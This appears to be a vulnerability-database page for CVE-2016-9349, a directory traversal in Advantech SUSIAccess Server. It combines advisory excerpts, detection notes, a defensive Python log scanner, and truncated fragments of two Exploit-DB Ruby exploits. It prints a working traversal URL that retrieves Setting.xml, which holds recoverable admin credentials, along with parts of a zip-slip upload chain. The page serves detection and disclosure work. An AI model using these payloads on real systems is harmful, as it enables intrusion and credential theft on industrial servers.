CVE-2016-9349
Published 2017-02-13
Priority P357 · high · 7.5 (CVSS 3.0)
CVSS 3.0 vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
EXPLOIT · EPSS 7.88% (94.0th percentile)
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advantech | susiaccess | <= 3.0 | — |
Detection & IOCs (extracted from sources)
URL: http://<target>:8080/downloadCSV.jsp?file=../../../../../../../../../../Program%20Files\Advantech\SUSIAccess%203.0%20Server\Setting.xml
- Detect directory traversal attempts against the /downloadCSV.jsp endpoint using repeated '../' sequences in the 'file' parameter, particularly with a leading '/' followed by multiple '../' repetitions.
- Monitor HTTP GET requests to /downloadCSV.jsp on port 8080 with a 'file' parameter containing path traversal sequences ('../') or URL-encoded equivalents ('%2F', '%2E%2E').
- Alert on HTTP POST requests to /webresources/AccountMgmt/Login on port 8080 with both 'Authorization: Basic' and 'X-Requested-With: XMLHttpRequest' headers, which is the login step of the exploit chain.
- Detect multipart/form-data file upload requests to the SUSIAccess server on port 8080 containing a zip file named 'update.zip', which is the malicious zip used in the exploit.
- Flag retrieval of Setting.xml via the /downloadCSV.jsp traversal path, as it contains encrypted admin credentials that can be reversed due to a static hard-coded key.
- Monitor for zip files containing entries with leading '../' path traversal sequences (zip-slip pattern), specifically targeting the AcronisInstaller.exe filename placed at a traversal depth of 10 levels.
- The traversal depth defaults to 10 levels ('/' + '../' * 10), but the DEPTH option is configurable by the attacker, meaning traversal sequences of varying lengths should all be detected.
- The default target file is 'boot.ini' but the FILE option is fully attacker-controlled, so any file path may appear in the traversal request — do not rely on specific filenames for detection.
- The admin password is encrypted with a static hard-coded key, meaning any attacker who retrieves Setting.xml via the traversal vulnerability can offline-decrypt the admin credentials.
- Spaces in file paths are URL-encoded as '%20' by the exploit before being sent in the request URI.
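The detection notes above boil down to a few checks on the request line: the endpoint, a 'file' parameter carrying '../' in any encoding, a traversal depth that must not be assumed to be 10, and a filename that must not be assumed to be boot.ini. The following Python applies those checks to web-server access-log lines. It is an added example written for this page, not code from Advantech, CISA, ZDI or the Exploit-DB modules; the combined log format, the helper names and the sample lines (TEST-NET addresses) are constructed assumptions.

```python
"""Flag directory-traversal requests against /downloadCSV.jsp in access logs.

Added example; not code from the vendor, the advisory or the Exploit-DB
modules.  Assumes Apache/NGINX combined log format; sample lines below are
constructed for illustration.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a combined-format log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Endpoint named in the IOCs; compared case-insensitively because the
# product runs on Windows, where path lookups ignore case.
TRAVERSAL_ENDPOINT = "/downloadcsv.jsp"

# Constructed sample log (assumption): one Setting.xml retrieval at depth 10,
# a fully percent-encoded request, two benign requests, and a backslash
# variant at depth 2.
SAMPLE_LOG = r'''
203.0.113.5 - - [13/Feb/2017:10:00:01 +0000] "GET /downloadCSV.jsp?file=../../../../../../../../../../Program%20Files\Advantech\SUSIAccess%203.0%20Server\Setting.xml HTTP/1.1" 200 4096
203.0.113.5 - - [13/Feb/2017:10:00:02 +0000] "GET /downloadCSV.jsp?file=%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fboot.ini HTTP/1.1" 200 512
203.0.113.9 - - [13/Feb/2017:10:00:03 +0000] "GET /downloadCSV.jsp?file=report.csv HTTP/1.1" 200 2048
203.0.113.9 - - [13/Feb/2017:10:00:04 +0000] "GET /index.jsp HTTP/1.1" 200 1024
203.0.113.5 - - [13/Feb/2017:10:00:05 +0000] "GET /downloadCSV.jsp?file=/..%5C..%5Cwindows%5Cwin.ini HTTP/1.1" 200 256
'''


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so '%2E%2E%2F' and double-encoded
    '%252E%252E%252F' both collapse to '../'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def traversal_depth(path):
    """Count '..' hops after decoding and normalising '\\' to '/'.
    The count is reported rather than compared to 10, because DEPTH is
    attacker-configurable."""
    normalised = decode_fully(path).replace("\\", "/")
    return len(re.findall(r"(?:^|/)\.\.(?=/|$)", normalised))


def analyse_request(target):
    """Return a finding dict for one request target, or None if benign."""
    parts = urlsplit(target)
    if parts.path.lower() != TRAVERSAL_ENDPOINT:
        return None
    # parse_qs already decodes one layer; decode_fully handles the rest.
    for raw in parse_qs(parts.query, keep_blank_values=True).get("file", []):
        depth = traversal_depth(raw)
        if depth == 0:
            continue
        decoded = decode_fully(raw).replace("\\", "/")
        return {
            "depth": depth,
            "file": decoded,
            # Setting.xml holds the encrypted admin credentials; surface it.
            "setting_xml": decoded.lower().endswith("/setting.xml"),
        }
    return None


def scan_log(log_text):
    """Run analyse_request over every log line; return the findings in order."""
    findings = []
    for line_no, line in enumerate(log_text.strip().splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        finding = analyse_request(match.group("target"))
        if finding:
            finding["line"] = line_no
            finding["method"] = match.group("method")
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        tag = " [Setting.xml]" if f["setting_xml"] else ""
        print(f"line {f['line']}: depth {f['depth']} -> {f['file']}{tag}")
```

Two design points matter in practice: decoding is repeated until it stops changing, so a double-encoded '%252E' does not slip past a single-pass filter, and backslashes are normalised before counting, since the product's own paths use them. The depth is reported rather than matched against 10, and the filename is only used to raise the priority of Setting.xml hits, in line with the notes that both DEPTH and FILE are attacker-controlled.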
CVSS provenance
- NVD CVSS v3.0: 7.5 HIGH (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)
- NVD CVSS v2.0: 5.0 MEDIUM (AV:N/AC:L/Au:N/C:P/I:N/A:N)
GHSA
GHSA-2qpx-8vpw-42x9 (ghsa_unreviewed · 2022-05-17) · CVE-2016-9349 · HIGH · CWE-200
An issue was discovered in Advantech SUISAccess Server Version 3.0 and prior. An attacker could traverse the file system and extract files that can result in information disclosure.
CISA ICS
Advantech SUSIAccess Server Vulnerabilities (cisa_ics · 2016-12-01 · CVSS 7.5 · HIGH)
ICS Advisory
## Advantech SUSIAccess Server Vulnerabilities
Last Revised: December 01, 2016
Alert Code: ICSA-16-336-04
## OVERVIEW
Researcher rgod working with Zero Day Initiative (ZDI) has identified an information disclosure, a directory traversal, and a privilege escalation vulnerability in Advantech’s SUSIAccess Server. Advantech has produced new software to mitigate these vulnerabilities.
These vulnerabilities could be exploited remotely.
## AFFECTED PRODUCTS
The following SUSIAccess Server versions are affected:
- SUISAccess Server Version 3.0 and prior.
## IMPACT
Successful exploitatio
No detection rules found.
Exploit-DB
Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit) (exploitdb · 2017-08-01 · CVE-2016-9349)
```ruby
Advantech SUSIAccess 'Advantech SUSIAccess Server Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits an information disclosure vulnerability found in
Advantech SUSIAccess [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-9349' ],
[ 'ZDI', '16-628' ],
[ 'BID', '94629' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04' ]
],
'DisclosureDate' => 'Dec 13 2016'))
register_options(
[
OptInt.new('DEPTH', [ false, 'Levels to reach base directory', 10]),
OptString.new('FILE', [ false, 'This is the file to download', 'boot.ini']),
Opt::RPORT(8080)
], self.class )
end
def run
depth = (datastore['DEPTH'].nil? or datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
levels = "/" + ("../" * depth)
file = "#{levels}#{datast
```
Exploit-DB
Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload (exploitdb · 2017-08-01 · CVE-2016-9351 · CVSS 7.5 · HIGH)
```ruby
Advantech SUSIAccess \r\n"
post_data cookies,
'Authorization' => "Basic #{creds[0].to_s}",
'X-Requested-With' => "XMLHttpRequest",
'Content-Type' => "multipart/form-data; boundary=#{bound}",
'User-Agent' => "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0",
'Accept-Language' => "en-US,en;q=0.5",
'Accept' => "text/plain, */*; q=0.01",
'Connection' => "close"
})
req.body = post_data.join
http = Net::HTTP.new("#{target}", 8080)
res = http.start {|http| http.request(req)}
if res.code =~ /200/
puts "[+] Upload successful!"
end
end
def craftZip(target, payload)
path = "../../../../../../../../../../Program%20Files\\Advantech\\SUSIAccess%203.0%20Server\\Setting.xml"
uri = URI("http://#{target}:8080/downloadCSV.jsp?file=#{path}")
res = Net::HTTP.get_response(uri)
xml = No
```
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/94629
- https://ics-cert.us-cert.gov/advisories/ICSA-16-336-04
- https://www.exploit-db.com/exploits/42401/
- https://www.exploit-db.com/exploits/42402/